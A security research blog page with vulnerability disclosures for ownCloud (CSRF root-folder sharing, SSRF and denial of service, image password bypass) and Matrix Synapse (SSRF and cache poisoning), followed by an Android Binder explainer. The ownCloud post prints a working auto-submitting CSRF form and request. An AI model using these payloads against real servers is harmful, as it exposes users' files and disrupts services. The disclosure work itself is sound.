Hacktive Security Blog

ownCloud Multiple Vulnerabilities

During one of our research activities we discovered several flaws in the ownCloud product.
ownCloud is a popular open-source cloud service similar to Google Drive and the last CVE was from the far 2017 (2 years ago).
So, we started looking at and we disclosed 3 vulnerabilities related to file sharing, for sure a good attack vector. 

What we discovered could compromise user's root folder (read/write) via CSRF, cause an authenticated Denial of Service or interact with local services (SSRF) and bypass password protected images. Two of the three vulnerabilities have been fixed but for the third one we don't receive any feedback for more than 270 days so we decided to publish this research.

Compromise user’s root folder via CSRF

By exploiting a Cross-Site Request Forgery, it is possible to trick a user to share its whole root folder with another user or with a public link without authentication.

This is the vulnerable Request:
----
POST /ocs/v2.php/apps/files_sharing/api/v1/shares?format=json HTTP/1.1
Host: mycloud.com:8081
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: ocqbn9pixyab=XXXX; oc_sessionPassphrase=XXXX
Content-Length: 52

shareType=0&shareWith=attacker&permissions=31&path=./
----
Note: owncloud doesn't let users share their own root folder, you cannot do it via GUI and if you make a forged request with '/' to indicate the root folder, an error message is returned: 

undefined 

This was not a big deal because It was easily bypass-able just by using './' as a payload inside the 'path' parameter:

undefined

The 'shareType' indicates the type of sharing. In this case 0 means a share with another user specified in the 'shareWith' parameter. A shareType 3 means a public share through a public link with 15 random characters. The entropy is too high to bruteforce and it is seems well implemented (this share type could be fine chaining an XSS). Last, but not least, 'permissions' set to 31 means read and write permissions on the share.

Simulating an offensive scenario, this could be the attacker's page:

<form name="csrf" enctype="application/x-www-form-urlencoded" method=POST action=https://TARGET/ocs/v2.php/apps/files_sharing/api/v1/shares?format=json>
    <input type=hidden name=shareType value="0">
    <input type=hidden name=shareWith value="ATTACKER">
    <input type=hidden name=permissions value="31">
    <input type=hidden name=path value="./">    
</form>

<script>
document.csrf.submit();
</script>

 

Victim visits the page:

undefined

And the root folder has been shared with the attacker: 

undefined 

It would be cool to chain this vulnerability with a Cross-Site Scripting. Making a request from the same site doesn't trigger CORS, and the response is readable (in the response there is the public link). In this case, it could be just necessary to inject a script that makes a request to the vulnerable endpoint, read the response that contains the public link share, and send this one to the attacker. In this way, the whole root folder could be easily accessible from the internet and without authentication.
But, sadly, this is not the case (and owncloud also employs a strict CSP). We only had a CSRF, so we could only perform blind POST requests.

This wannabe scenario is still possible with older browsers that do not support CORS validation or configured web server with too permissive policies.  

Server Side Request Forgery + Denial of Service

A convenient functionality is to fetch files from a public link to your own (own-)cloud. When you receive a public link and you want to save the file in your cloud, you can use the arrow at the top right and it will do the hard work for you:

undefined

In order to fetch the file, it has to know where you want to get the file, and it is specified in the following request:

undefined 

From this parameter you can perform Server Side Requests to arbitrary local services, including the loopback:

undefined

And we receive the request from localhost:

undefined

The docker provided from their official repository ships with Redis configured, that could be an interesting component to attack with our SSRF. In the first request we do not have many controllable parameters, just the URI (without CLRF). So we started to go deeper, because, it has to make other requests in order to fetch a file from another cloud.
We started to analyze the flow between two valid clouds (thanks burp for the reverse proxy job) and we were right, we got multiple requests:

undefined

(screen from ngrok - cleaner than burp requests)

Maybe we could be lucky and find something more useful in later requests (some parameters are reflected from response of the receiver cloud).. But nope. That was a fail. After 2 days of fuzzing/implementation of a valid clone of a ownCloud receiver in python (and ngrok in order to avoid caching of a target domain), we stopped because it was not the right path, and we were losing too much time for a potential Authenticated RCE valid only for some environments. And, unfortunately, we couldn't achieve RCE.

By the way, SSRF can be used to scan the internal network for open services and/or interact with them, but if it doesn't reach a couple of addresses .. you have a nice little Denial Of Service (tested on a production server):

Burp DOS configuration:

undefined

undefined

undefined

And few seconds later…

undefined

Bypass password protected images

When you want to share to non authenticated users something in the cloud, you can use the 'Share with Public Link' option and protect it with a password in order to avoid other people watching it, if they eventually reach the link.
When sharing Images, the generated token (the 15 characters long narrowed before) can be used in the preview functionality without authentication, bypassing the required password.
The protected shared image:

undefined

Image leaked:

undefined

Disclosure Timeline:

17/10/2019 - Issues reported
15/11/2019 - Request an update since we didn’t receive any reply
13/12/2019 - 2 of 3 vulnerabilities fixed
09/02/2020 - We requested an update for the third vulnerability
09/02/2020 - They’re working to patch it
13/07/2010 - No patch, we informed them that we are going to make them public
27/07/2020 - No reply, issues published


(Alessandro Groppo)

 

Matrix Synapse 1.12.3 - SSRF and Cache poisoning

tl;dr

After some emails with the Matrix security response team, the Matrix Synapse servers have been found affected by a security issue about the lack of a validation system for "Server-to-server" API leading to SSRF and Cache poisoning subsequently marked by the team as “feature” or “intended”.
The scope of this article is to clarify this point; a malicious user, if not specifically denied by configuration files, could effectively load malicious content using what is called the “Server-To-Server” API and, since the caching mechanism allows a lifetime of 24h, it could allow to host arbitrary files for that duration.
After a discussion with the team, as I stated before, they came to conclusion that this is an intended behavior and the best solution is to use an offload antivirus to scan for common malicious patterns on the uploaded files.

In conclusion, I want to thank the security response team for the response and for having this discussion.

Reponsible disclosure timeline

2020-04-29 Vendor is notified
2020-05-31 First contact with the security response team
2020-06-08 Discussion about the issue, marked as "intended"
2020-06-16 Disclosure

 

Introduction

Matrix is an open standard for a decentralized, interoperable and real time communication over IP.
This standard is widely documented and it defines a set of open APIs for communications. Its main point of strength is the ability to have a decentralized, securely encrypted and segregated federation of servers, giving the opportunity to every user that uses this standard to take advantage of the following capabilities:

  • Instant Messaging (IM)
  • Voice over IP (VoIP)
  • Internet of Things (IoT) communication
  • A good amount of integrations (or bridges) with external IM/VoIP protocols like:
    • IRC
    • Skype
    • Telegram
    • WhatsApp
    • E-Mail
    • Hangouts
    • WeChat
    • Twitter
    • Keybase
  • A good and simple set of JSON Rest APIs that allows developers to create their own clients or bots
  • Fully opensource
  • KISS principle
  • End-To-End encryption feature by design

 

The federation concept

The idea behind a federation server is simple and yet effective; an isolated, on-premise Matrix server will be capable to interact with other servers using a common API.
Following a schema taken from the matrix.org website:

 

undefined

Figure 1 The matrix federation architecture

Every matrix client connected to a federated server can, if not specifically denied by configuration, communicate with other people from other servers or channels. Cryptographic’ private keys will not be shared among the federated servers.
The communication between servers is documented in the Federation API (or Server-Server API) docs.

The federation API

Matrix home-servers use the Federation API in order to communicate with each other. Home-servers interact with these APIs in order to push messages to each user, join channels, retrieve history and query the information about users on each server using JSON format.
One part of this is called the “Server discovery” API. And it will be the main subject of this research.


The bug - Server-Side Request Forgery and Cache Posioning

If not specified, matrix home-servers allows to integrate with other federated servers by using an exposed API. The following screenshot is an example of a file download that is located in the matrix.org federated server:

 

undefined


The highlighted part defines which federated server should be used to download the file. By giving a different URL, the following response is received:

 

undefined

Figure 2 Original request

 

undefined

Figure 3 Callback

 

So, the federated server is looking for a “server” file inside the “.well-known/matrix” path. As specified in the documentation, the server is expecting a JSON formatted file that specifies the information about the federated server like the following:

 

undefined

Figure 4 Expected configuration file


With this in mind, some aspects should be considered:

  • Loopback or localhost address, even specified as numeric IPs (like 127.0.0.1) are blacklisted by default (the “federation_ip_range_blacklist” parameter on “homeserver.yaml” file)
  • Using protocols different from HTTP or HTTPS will result in a timeout
  • 30x redirects are accepted
  • The cache lifetime is statically set to 86400 seconds (1 day). When a subsequent request to the same host is made, the result will be the same as the last one (this will open a Cache Poisoning scenario described later).
  • If not specified, the 8448 port will be used
  • The TLS certificate must be valid, so no unencrypted protocols can be used (if not allowed from configuration file)
     

 

The next step is to create a configuration file that points to the attacker’s-controlled endpoint:

undefined

Figure 6 Configuration file

 

And, after issuing another request, a callback is received:

 

undefined

 

undefined

Figure 8 Callback

 

In order to obtain a full exploitation scenario, a “malicious file” is created.

undefined

Figure 9 Creating a "malicious" file

 

And a new host is configured on .well-known/matrix/server file:

undefined

Figure 10 New matrix server configuration file

 

Then, a new request for the “malicious_file” is made:

 

undefined

Figure 11 The malicious file is cached for 24h

 

So, from now on, this file will be available in matrix.org servers for 24 hours; even if the external federated server is not available.

 

undefined

Figure 12 File download

 

Impact of this vulnerability

An attacker could exploit these two vulnerabilities in order to:

  • Host malwares or, generally speaking, infected files
  • Use it as a C2 server in order to broadcast files or messages
  • Use it to launch denial of service attacks
  • Hide the attacker IP while sending HTTP requests (using the server as a reverse proxy).
  • If an XSS vulnerable application is hosted on the same host, this could bypass the Same-Origin Policy and allows an attacker to embed
  • JavaScript files directly into the application, as long as share application cookies.

Affected versions

At the time of writing, the affected version is “1.12.3” as reported from the matrix.org API:

Remediation

The remediation is simple and it’s just a matter of specifying a list of whitelisted federated servers on the “/etc/matrix-synapse/homeserver.yaml” file. Unfortunately, this parameter is not set by default nor mandatory while installing the matrix server and there are some considerations to take in mind while applying this remediation (take a look at “Final considerations and thoughts” chapter).

undefined

Figure 13 Effective remediation

Final considerations and thoughts

There are some aspects to take in consideration while analyzing this vulnerability. This flaw is basically leveraging on a feature and, in some cases, a remediation like the one proposed in the “Remediation” chapter isn’t feasible.
A server like Matrix.org that SHOULD allow every federated server to connect and interact; the whitelist scenario may not be applicable.

DevOps should be aware that keeping the default settings and letting every federated server to inter-communicate with each other is a serious security risk. This, at the same time, would effectively help the “Federated network” concept to grow.

Fixing this vulnerability could be a serious hit on the matrix-synapse federated network’s idea; let’s imagine the case. The server blocks the ability to download files or perform requests to external locations, so files are not shared among others federated servers. The result is that User A on server 1 cannot share files with User B on server 2, and vice-versa.

Lastly, while the note on the configuration file “/etc/matrix-synapse/homeserver.yaml” states:

# N.B. we recommend also firewalling your federation listener to limit
# inbound federation traffic as early as possible, rather than relying
# purely on this application-layer restriction. If not specified, the
# default is to whitelist everything.

This clearly isn’t a good solution if the server needs to be inter-connected with the rest of the world.

(Cristian 'void' Giustini)

Android IPC: Part 2 - Binder and Service Manager Perspective

Introduction

As mentioned in the previous article, Android uses the Binder for IPC communications. Good to know, the Binder was not created by Google. Its initial appearance was in BeOS, an old OS for mobile devices. After some acquisitions, original developers joined Android and took the Binder with them. The OpenBinder porting to Android was more implementation specific and it is a key component of the current Android OS. The official OpenBinder website is not up anymore, but there are some mirrors like this one that contain precious documentation.

High level overview

Binder is a Kernel module written in C++, mainly responsible to let processes securely, transparently and easily communicate with each other using a client-server architecture. The simplicity on how processes can interact together is awful, a client application just needs to call a method provided by the service (that is the server in the client-side architecture) and everything in between is handled by the Binder. With ‘everything in between’ I mean Location, Delivery and credentials.

When a client needs to talk to a service, he needs to locate the target service (that is, the target process). The Binder is responsible to locate the service, handle the communication, deliver messages and check for caller privileges (Credentials).
The location stage is handled by the servicemanager that acts as the endpoint mapper, it maintains a service directory that maps an interface name to a Binder handle. So, when the Binder receives a request for a specific service, it interrogates the servicemanager. The servicemanager will return a handle to it after some permission checks (for example the AID_ISOLATED mentioned in the first part) scrolling on its service list (aka service directory). If the client has permissions to interact with the requested service, the Binder will proxy the communication and deliver the message to the server, that will elaborate the request and return the result to the Binder, that will turn it to the client as a 'message'. These messages are technically called 'Parcel', containers that are written from both client and server in order to communicate serializing and deserializing necessary data (that can be parameters for clients and return values for services).

undefined

This is how IPC communications, at a higher level, are handled by Android.

Binder Introduction

Let's start with the main component of an IPC transaction, the Binder. As we said, the Binder is a small kernel module that lives in the kernel and acts as a messenger for clients and services. Every operation in Android goes through the Binder, and that's why two researchers, Nitay Artenstein and Idam Revivo, took an interesting talk at BH2014, ‘Man in the Binder: He Who Controls IPC, Controls the Droid’ (Youtube Video).
This research demonstrates an advanced post exploitation technique (a rootkit implant) where it is possible to sniff every data that uses IPC, in order to manipulate network traffic and sensitive information by hooking binder calls.

The character device at /dev/binder is read/write by everyone, any process can perform read and write operations on it using ioctl(). The ioctl() responsible to handle the IPC connection from clients (applications) is located in the 'libbinder.so' shared library, that is loaded in each application process. This library is responsible for the client initialization phase, setting up messages (aka Parcel) and talking with the binder module. We will deepen this specific library while talking, in next chapters, about the client and service implementations.

Binder interactions (userland --> kerneland)

First to introduce more concepts, let's first take an introduction on how a basic interaction works from userland to kerneland, from a client (or a service) to the binder kernel module.
As a linux based OS, ioctl system call is used to talk with the kernel module using the special character file '/dev/binder'. The driver accepts different request codes:

BINDER_SET_MAX_THREAD: Set limit thread numbers of a thread pool (deepened in the client/service implementation chapter)
BINDER_SET_CONTEXT_MGR: Set the context manager (the service manager)
BINDER_THREAD_EXIT: A thread exit the thread pool
BINDER_VERSION: Get the Binder version
BINDER_WRITE_READ: The most used code used for client and service requests

We will deepen all commands during these articles, but let's start with the BINDER_WRITE_READ request code.
The binder module source code is at drivers/android/binder.c, here the binder_ioctl() is responsible to dispatch requests received from userland based on above request codes. In the case of a BINDER_WRITE_READ code, the binder_ioctl_write_read() is triggered and parameters are handled from userland to kerneland (and vice versa) using the binder_write_read structure:

struct binder_write_read {
    signed long write_size; // size of buffer by the client
    signed long write_consumed; // size of buffer by the binder
    unsigned long write_buffer;
    signed long read_size; // size of buffer by the client
    signed long read_consumed; // size of buffer by the binder
    unsigned long read_buffer;
};

In this structure, we have 2 main divisions: write and read items.
Write items (write_size, write_consumed, write_buffer) are used to send commands to the binder that it has to execute, meanwhile read items contain transactions from the binder to the clients that they have to execute (them whose ‘ioctl’ the binder).

For example, if a client needs to talk to a service, it will send a binder_write_read command with write items filled. When binder replies back, the client will have read items filled back. The same, a service waiting for client interactions, will receive transactions from the Binder with read items.
While talking about 'clients', I don’t mean only application clients that need to perform a request in an IPC context. A client, in this context, is a process that ioctl() the binder. For example, a service waiting for transactions from an application is a client of the binder, because it calls ioctl() in order to receive actions.

undefined

Note that in the case of a client, the ioctl() is performed when it is needed from the application (for example to perform an Inter Process Communication). Meanwhile, the service process has threads waiting in a loop for transactions from the binder.

Inside these read and write attributes we have more commands, that starts with BC_* and BR_*. The difference is in the way that the transaction is going, to or from the Binder. BR are commands received FROM the binder, while BC are commands SENT to the binder. To remind me about this difference, I think to them as they are 'BinderCall' (BC) and 'BinderReceive' (BR), but I think is not an official naming convention, so in case just use it as a reminder.

An example can be the most common TRANSACTION, we can have BC_TRANSACTION and BR_TRANSACTION.
BC_TRANSACTION is used from clients to binder, while BR_TRANSACTION is used from the binder to its clients.

The Servicemanager

As was illustrated in the High Level overview, the servicemanager is responsible for the location stage. When a client needs to interact with a service (using the Binder), the Binder will ask the servicemanager for a handle to that service.

The servicemanager source code is located at frameworks/native/cmds/servicemanager/, where service_manager.c is responsible to initialize itself and handle service related requests. Meanwhile, in binder.c (inside that path, not the kernel module) we find the code responsible to handle the communication with the binder, parsing received requests from it and sending the appropriate replies.
Servicemanager is started at boot time as defined in /init.rc file. This init file is part of the boot image and is responsible to load system partitions and binaries in the boot process:

/.../
# start essential services
start logd
start servicemanager
start hwservicemanager
start vndservicemanager
/.../

# When servicemanager goes down, restart all specified services
service servicemanager /system/bin/servicemanager
class core
user system
group system
critical
onrestart restart healthd
onrestart restart zygote
onrestart restart media
onrestart restart surfaceflinger
onrestart restart drm
onrestart restart perfhub
/.../

When the service manager is started, the main function obtains an handle to the binder ('/dev/binder') and successively call binder_become_context_manager(), that will ioctl the binder with the BINDER_SET_CONTEXT_MGR command, in order to declare itself as the context manager.
The context manager is crucial for the binder as it serves as the service locator. When the binder needs to locate a service, it asks for a handle to its context manager.
Once the registration with the binder it's done, it calls binder_loop (from binder.c) with a callback function parameter. This callback (svcmgr_handler) will be responsible to handle service related requests.

The binder_loop assignment, as the name says, is to start an infinite loop that will receive requests from the binder. Before this loop, it will call the binder with BC_ENTER_LOOPER, to inform the binder that a specific thread is joining the thread pool. The thread pool is a group of threads that are waiting for incoming messages from the Binder, usually services have multiple threads in order to handle multiple requests. By the way, the service manager is a single-threaded service, so this is the first and unique thread.

After this notification, the servicemanager starts its infinite loop that continuously asks the binder (using ioctl) waiting for actions. This is managed using the BINDER_WRITE_READ command (to the binder) with a binder_write_read structure that will be filled by the binder in its read_* items, this is the structure:

struct binder_write_read {
    signed long write_size; // size of buffer by the client
    signed long write_consumed; // size of buffer by the binder
    unsigned long write_buffer;
    signed long read_size; // size of buffer by the client
    signed long read_consumed; // size of buffer by the binder
    unsigned long read_buffer;
};

When the binder needs the service manager to perform an action (e.g. getting a handle to a service) it will return to the binder_loop() a binder_write_read structure with read_buffer filled with the requested transaction (and in read_consumed its actual size). These two values are passed over the binder_parse() function that will start to ‘deserialize’ the transaction request:

/ .. /
uintptr_t end = ptr + (uintptr_t) size; // end calculated using the bwr.read_consumed
while (ptr < end) {
    uint32_t cmd = *(uint32_t *) ptr; // the command is read from the buffer
    ptr += sizeof(uint32_t);
    // switch case on the received command
    switch(cmd) {
        // BR_NOOP is a command
        case BR_NOOP:
        break;
/../

The first 32 bits of the bwr.read_buffer contains the command to be executed (CMD).
There is a huge list of handled commands: BR_NOOP, BR_TRANSACTION_COMPLETE, BR_INCREFS - BR_ACQUIRE - BR_RELEASE, BR_DECREFS, BR_DEAD_BINDER, BR_FAILED_REPLY - BR_DEAD_REPLY, BR_TRANSACTION, BR_REPLY.

You can find a lot more BR_* commands, but these are the only ones handled by the servicemanager. For example, a normal service can receive a SPWAN_LOOPER command from the binder, that requests the service to spawn a new thread in order to handle more requests. We said that the servicemanager is single thread, so there is no sense to receive this type of requests, so they are not handled. We will better deepen on these commands that are used by other services in IPCThreadState.cpp in next articles.

After having extracted the command from the binder_read_write structure, this one is inserted in a switch case where above commands are managed. The most interesting one is the BR_TRANSACTION, because it means that the binder needs to retrieve a service handle or register a new service.

BR_TRANSACTION

Following the source code, we can encounter and deppen some essentials structures, such as the binder_transaction data that is casted from bwr.read_buffer (now referenced in the local function as ptr) + sizeof(uint32_t), that’s because the first 32 bits are dedicated to the command constant.

struct binder_transaction_data *txn = (struct binder_transaction_data *)

ptr;

undefined

This is the binder_transaction_data structure:

//https://android.googlesource.com/kernel/msm/+/android-6.0.1_r0.74/drivers/staging/android/uapi/binder.h
struct binder_transaction_data {
/* The first two are only used for bcTRANSACTION and brTRANSACTION,
* identifying the target and contents of the transaction.
*/
    union {
        __u32 handle; /* target descriptor of command transaction */
        binder_uintptr_t ptr; /* target descriptor of return transaction */
        // in BR_TRANSACTION this must be BINDER_SERVICE_MANAGER or the service_manager return -1
    } target;
    binder_uintptr_t cookie; /* target object cookie */
    __u32 code; /* transaction command. */ // e.g. SVC_MGR_GET_SERVICE
    /* General information about the transaction. */
    __u32 flags;
    pid_t sender_pid;
    uid_t sender_euid;
    binder_size_t data_size; /* number of bytes of data */
    binder_size_t offsets_size; /* number of bytes of offsets */
    /* If this transaction is inline, the data immediately
    * follows here; otherwise, it ends with a pointer to
    * the data buffer.
    */
    union {
        struct {
            /* transaction data */
            binder_uintptr_t buffer;
            /* offsets from buffer to flat_binder_object structs */
            binder_uintptr_t offsets;
        } ptr;
        __u8 buf[8];
    } data;
};

This structure contains necessary information about the incoming request, such as the sender PID and UID to check permissions for a service, the target descriptor and the transaction command for the service manager (for example PING_TRANSACTION or SVC_MGR_CHECK_SERVICE).

This binder_transaction_data structure initializes a new binder_io (binder I/O) structure using bio_init_from_txn(), that will copy data and offsets from binder_transaction_data to this new one.

struct binder_io
{
    char *data; /* pointer to read/write from */
    binder_size_t *offs; /* array of offsets */
    size_t data_avail; /* bytes available in data buffer */
    size_t offs_avail; /* entries available in offsets array */

    char *data0; /* start of data buffer */
    binder_size_t *offs0; /* start of offsets buffer */
    uint32_t flags;
    uint32_t unused;
};

undefined

bio_* functions refers to operations on the binder_io structure, here is an example on how the that structure is filled from binder_transaction_data:

void bio_init_from_txn(struct binder_io *bio, struct binder_transaction_data *txn)
{
    bio->data = bio->data0 = (char *)(intptr_t)txn->data.ptr.buffer;
    bio->offs = bio->offs0 = (binder_size_t *)(intptr_t)txn->data.ptr.offsets;
    bio->data_avail = txn->data_size;
    bio->offs_avail = txn->offsets_size / sizeof(size_t);
    bio->flags = BIO_F_SHARED;
}

As we can see, buffer and offsets (including their size) of binder_transaction_data are filled in their relative binder_io structure, and both structures are passed over the service manager callback function (the svcmgr_handler() function defined in service_manager.c while calling binder_loop()):

res = func(bs, txn, &msg, reply);
// func -> binder_handle defined in service_manager.c - binder_loop(bs, svcmgr_handler);
// bs -> binder_state
// txn -> binder_transaction_data
// msg -> binder_io initialized from binder_transaction_data
// reply -> an empty binder_io that will contain the reply from the service manager

Now, the BR_TRANSACTION is inside the svcmgr_handler().
The binder_transaction_data.ptr must contain BINDER_SERVICE_MANAGER in order to continue (otherwise return -1) and binder_transaction_data.code contains the service manager command. These service commands (dispatched in a switch condition) can be:

PING_TRANSACTION: It is a ping to the servicemanager, so return 0.
SVC_MGR_GET_SERVICE - SVC_MGR_CHECK_SERVICE: Get a handle to a service. They follow the same switch path
SVC_MGR_ADD_SERVICE - Add a new service
SVC_MGR_LIST_SERVICES - List all available services

Let's start to dig into SVC_MGR_GET_SERVICE.

SVC_MGR_GET_SERVICE

This service command occurs when the binder needs a service handle based on a service name (requested from a client).
The service name is taken from the binder_io structure (referred as `msg` in the source) using bio_get_string16().
We have different functions as bio_get_* (bio_get_uint32, bio_get_string16, _bio_get_obj, bio_get_ref). They are all primitives of bio_get() that retrieves the requested data type from (binder_io)bio->data. The same for bio_put_* functions in order to insert data in a binder_io structure while replying to a command.
do_find_service() is called with the service name and the caller UID and PID from the binder_transaction_data structure and immediately call find_svc(), that will iterate its service singularly linked list and return an `svcinfo` structure if match the requested service name:

{
    struct svcinfo *next; // pointer to the next service
    uint32_t handle;
    struct binder_death death;
    int allow_isolated;
    uint32_t dumpsys_priority;
    size_t len;
    uint16_t name[0];
} svcinfo;

undefined

The svcinfo structure mainly contains information about the target service.
If the service matches the svcinfo.name item, the structure is returned to the do_find_service() function, that is responsible to perform extra checks.
The first check is about process isolation. As we were talking in the first part of this series, some services are not allowed to be called from isolated apps (such as. web browsers):

if (!si->allow_isolated) {
    uid_t appid = uid % AID_USER;
    if (appid >= AID_ISOLATED_START && appid <= AID_ISOLATED_END) {
        return 0;
    }
}

In this piece of code, the UID retrieved from binder_transaction_data struct (coming from the binder) is verified against AID_ISOLATED_START and AID_ISOLATED_END. These UIDs (a range from 99000 to 99999) are associated with isolated processes and they can interact only with services with svcinfo.allow_isolated set to True.
If this check is passed, a SELINUX permission checks if the sender is allowed to retrieve the service, and the handler is returned to the main switch case in the service handler. The returned handle will be put inside the binder_io reply using `bio_put_ref()` and return 0, meaning everything is fine. Later on we will see how the message is sent back to the binder.

SVC_MGR_LIST_SERVICES

We can also list available services with the SVC_MGR_LIST_SERVICES command, that will iterate through the service list (svclist) and put the result in the binder_io reply message using bio_put_string16(). There is also an interesting condition on dumpsys_priority. The priority, that can be defined while registering a new service, can be of three levels: CRITICAL, HIGH and NORMAL. While listing all services, we can choose to dump only services with a specific priority (specified in the svclist structure).
For example, using the dumpsys utility in Android, we can specify the desired level:

adb > `dumpsys -l --priority CRITICAL`
Currently running services:
    SurfaceFlinger
    activity
    cpuinfo
    input
    notification
    window

`dumpsys -l --priority HIGH`
Currently running services:
    connectivity
    meminfo

adb > `dumpsys -l --priority NORMAL`
Currently running services:
    activity
    connectivity
    notification

SVC_MGR_ADD_SERVICE

If the requested command from the binder is SVC_MGR_ADD_SERVICE, the binder is proxying a client request to register a new service. Details about the new service are taken from the binder_io message (binder_io->data). Service attributes are the service name, the priority level (dumpsys_priority), the handle and if it is permitted to interact with the service from isolated apps (allow_isolation). The function do_add_service() is called with this information and the caller UID and PID from the binder_transaction_data message.
This function is responsible to check for caller permissions (the process that requests the registration), starting by checking its UID to avoid the creation of a new service from standard applications. This is accomplished by checking if the AID_APP is over 10000.
In Android, installed applications start from UID 10000, so the condition is aimed to prevent an user application from installing a new service (or override an existing one). That also means that the privileged system user (with UID 1000) can register a new service.
If this condition is satisfied, a SELINUX check controls that the caller process has 'add' permissions. If the caller process has rights to register a new service, find_svc() checks if the service name has been already registered. If it already exists, the service handle is overridden with the new one, and svcinfo_death() called.
Before going in depth with this function behaviour, let's introduce the scenario where the service does not exist:

struct svcinfo *si;
/../
si->handle = handle;
si->len = len;
memcpy(si->name, s, (len + 1) * sizeof(uint16_t));
si->name[len] = '\0';
si->death.func = (void*) svcinfo_death;
si->death.ptr = si;
si->allow_isolated = allow_isolated;
si->dumpsys_priority = dumpsys_priority;
si->next = svclist;
svclist = si;
/../

undefined

The code is pretty self-explanatory, it is populating the new structure with input values and updates its service list with `si->next = svclist` and `svclist = si ` (linked list behavior). And here, we are back with the death that we were talking some lines above.

The binder_death structure, part of the svclist, contains two items, func and ptr. The ptr is a pointer to its service structure (itself), and the func is a function pointer pointing to svcinfo_death().
This death function sets the service handle to 0 and informs the binder that the service is dead using a BC_RELEASE with the service handle as parameter, so the binder can release this reference. The binder can use this information to also inform associated clients that the service is down using BR_BINDER_DOWN, if clients requested for it (by sending a BC_REQUEST_DEATH_NOTIFICATION for the service to the binder).
On the other side, when a service is registered or overridden, a BC_ACQUIRE with the service handle as parameter is sent to the binder, also with the BC_REQUEST_DEATH_NOTIFICATION in case the service goes down (for example if its crashes).

Comeback to the service handler

When one of these described commands are executed, the Binder usually expects a reply back.
While handling commands, SVC_MGR_ADD_SERVICE puts 0 in reply message if success (bio_put_uint32(reply, 0);) or simply return -1 if something fail, and the binder will receive an empty reply (that was previously initialized using bio_init()).
SVC_MGR_GET_SERVICE and SVC_MGR_LIST_SERVICES act in the same way if something goes wrong (-1 and empty reply packet), or they will return 0 to the function after have filled the reply packet with necessary values (handle in case of get service, and the list of services for the service list command).

When the service handler returns, the execution flow comes back inside the `binder_parse()` function (in the BR_TRANSACTION switch case) with the reply packet and the result value of the servicemanager handler. Based on the binder_transaction_data.flags, if TF_ONE_WAY is set, means that is an asynchronous call, the binder does not expect a reply, so the servicemanager will inform the binder to free the binder_transaction_data.ptr.buffer with a BC_FREE_BUFFER command (internally using the binder_free_buffer() function). If it's not an asynchronous call, it will send the reply back to the binder using binder_send_reply() that will send a BC_REPLY command.

Also, as you could notice, all these functions (binder_send_reply, binder_free_buffer, ..) are meant to be easily called inside the source code, and will perform all setup operations to interact with the binder with the final ioctl(). Let's take a simple example of the binder_free_buffer mentioned before.

void binder_free_buffer(struct binder_state *bs,
                                   binder_uintptr_t buffer_to_free)
{
    struct {
        uint32_t cmd_free;
        binder_uintptr_t buffer;
    } __attribute__((packed)) data;

    data.cmd_free = BC_FREE_BUFFER;
    data.buffer = buffer_to_free;
    binder_write(bs, &data, sizeof(data));
}

This function, previously used by the service manager handler to inform the binder to free a buffer, will setup, using a data structure, a cmd_free with BC_FREE_BUFFER on it and the buffer to free, then call binder_write(). binder_write is the final function that will put received input inside a binder_write_read.write_buffer structure before ioctl the binder with the BINDER_WRITE_READ command:

int binder_write(struct binder_state *bs, void *data, size_t len)
{
    struct binder_write_read bwr;
    int res;

    bwr.write_size = len;
    bwr.write_consumed = 0;
    bwr.write_buffer = (uintptr_t) data;
    bwr.read_size = 0;
    bwr.read_consumed = 0;
    bwr.read_buffer = 0;
    res = ioctl(bs->fd, BINDER_WRITE_READ, &bwr);
    if (res < 0) {
        fprintf(stderr,"binder_write: ioctl failed (%s)\n",
        strerror(errno));
    }
    return res;
}

We can note the differences on the usage of the binder_write_read structure now and before.
When we were expecting an action from the binder (in the binder_loop) the received action was inside the read_buffer (that contains the BR_* command). Now, the binder needs to perform actions based on our input, so we are using the write_buffer (with a a BC_* command).

Said that, we can come back inside the binder_send_reply(), that is responsible to send the reply of performed actions to the Binder. This is the source code:

void binder_send_reply(struct binder_state *bs,
                                   struct binder_io *reply,
                                   binder_uintptr_t buffer_to_free,
                                   int status)
{
    struct {
        uint32_t cmd_free;
        binder_uintptr_t buffer;
        uint32_t cmd_reply;
        struct binder_transaction_data txn;
    } __attribute__((packed)) data;

    data.cmd_free = BC_FREE_BUFFER;
    data.buffer = buffer_to_free;
    data.cmd_reply = BC_REPLY;
    data.txn.target.ptr = 0;
    data.txn.cookie = 0;
    data.txn.code = 0;
    if (status) {
        // the svcmgr_handler return -1
        data.txn.flags = ;
        data.txn.data_size = sizeof(int);
        data.txn.offsets_size = 0;
        data.txn.data.ptr.buffer = (uintptr_t)&status;
        data.txn.data.ptr.offsets = 0;
    } else {
        // the svcmgr_handler return 0
        data.txn.flags = 0;
        data.txn.data_size = reply->data - reply->data0;
        data.txn.offsets_size = ((char*) reply->offs) - ((char*) reply->offs0);
        data.txn.data.ptr.buffer = (uintptr_t)reply->data0;
        data.txn.data.ptr.offsets = (uintptr_t)reply->offs0;
    }
    binder_write(bs, &data, sizeof(data));
}

Note the declared data structure, it contains an integer cmd_free (that will be BC_FREE_BUFFER), the buffer, the cmd_reply (that will be BC_REPLY) and a binder_transaction_data structure.
The buffer to free is binder_transaction_data.data.ptr.buffer (previously casted in binder_io. it contains 'parameters', for example a service name for the servicemanager) and then the structure is filled based on the status value.
The status value is the return value from the servicemanager handler (svcmgr_handler) that can be 0 if everything was fine (and the reply was filled) or -1 if something went wrong.
If the result is -1, this result is copied inside the data.txn.data.ptr.buffer (so inside the binder_transaction_data of the data structure).
If the result of the service manager handler was fine (0), the binder_transaction_data is filled with reply's data/offset buffers and passed over the binder_write() function, that, as explained before, will take the data structure and put it in binder_write_read.write_buffer before calling ioctl() with the BINDER_WRITE_READ command.

Little resume

The servicemanager is started by the init process (as defined in /init.rc) and first of all it becomes the context manager for the binder. Then he notices the binder that will enter an infinite loop (BC_ENTER_LOOPER) and starts to read and parse operations delivered from the binder. When such events are related to service lookup or service registration (SVC_MGR_GET_SERVICE and SVC_MGR_ADD_SERVICE) the binder request the servicemanager for a BR_TRANSACTION with one of these commands inside its binder_transaction_data structure. The servicemanager checks for necessary rights on the caller process (information sent from the binder) and, in the case of a service lookup, returns an handle to the binder. When it's done, the reply is sent to the binder using ioctl with BINDER_WRITE_READ with the reply inside the write_buffer and the BC_REPLY command.

Conclusions

In this post, we concentrated on transactions between the Binder and the servicemanager. This is a crucial component for IPC. In the following blog post, we will deepen the client and service perspective for IPC transactions.

(Alessandro Groppo)

Multiple SSRF on Vanilla Moodle Installations

